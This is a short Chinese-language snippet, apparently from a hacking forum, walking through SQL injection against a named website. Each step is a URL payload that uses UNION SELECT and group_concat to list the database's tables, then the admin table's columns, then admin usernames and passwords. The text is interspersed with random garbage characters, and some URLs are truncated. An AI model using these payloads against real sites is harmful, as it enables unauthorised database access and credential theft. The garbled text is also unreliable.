3 `% d1 ~1 ]( I. t * c4 I$ z4 J/ l# L& u+ f/ T读出所有表: / ~# ^& h' w. A* ^9 R, r- Xhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database() + D# `% ?9 W J2 T: L% e) p/ B: x4 p6 U3 E4 e
读出所有表字段: 6 d: N8 w( H5 ahttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110) / B% {; P8 B( w) ~*/ (97,100,109,105,110)为admin的ascii码 依次类推/ b0 i* ]! l: ~- O$ N! ]
7 K8 Y: A, N e- o7 ]7 D. @读出所有表字段里的内容: 6 S+ Z' [; D5 z u2 Qhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin m3 T: C- g+ g7 m) [: F! V6 A/ i3 m5 A
9 r5 B# r8 K- G, `$ m- h X ( E2 ^( p3 f3 y! C/ e. `5 a( y0 J F * H% I( S; `- O' o& e& z6 X( m2 A4 a' N: Z
, A) m( Y A/ N# G1 b Mhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23) Q. P* H/ @$ [) C4 u
& \3 x; Q8 o1 w5 o! J) z
% k- m* l a vhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%231 k) G! ^& o6 n* K. U2 e